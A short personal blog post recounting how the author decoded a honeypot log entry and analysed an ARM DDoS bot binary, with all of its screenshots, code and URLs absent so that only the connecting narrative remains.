sobota, 26 listopada 2016

Basics of ARM/MIPS malware analysis

On one of my honeypot's I found an interesting log line, related to some URL-encoding. I was wondering what's there if I will be able to decode that GET...

Line I'm talking about:

Visiting this URL will show me the page:

...but we will get back to it later. After decoding the string I was able to find another GET, this time to the binary for ARM.

Quick download and open:

I was looking for some functions:

Reading the "code-flow" starting from the Main() function:

I was able to understand the idea of the binary a little bit:

...and more:

And that's how I found this function:

Next I tried here:

...and here:

Yep, some pseudo-C code ;) Next:


Next function was getlocalip():

On this stage, I was wondering if there are other interesting function (names):

So now, I was able to read other function (names) as well:

Connect(). Next one, reading remote input (to give you some RCE abilities):

...and we'll land here:

Reading (and 'decoding') the string, it looks like it will take us here:

So... calculating hex2string, it looks like the C&C server is located here (correct me if I'm wrong please):

So, here:

... and it will take us here:

So... nice DDoS bot. 

...but it's already known and analysed here. Big thanks for the SANS paper. It helped me a lot during this case. :)


Brak komentarzy:

Prześlij komentarz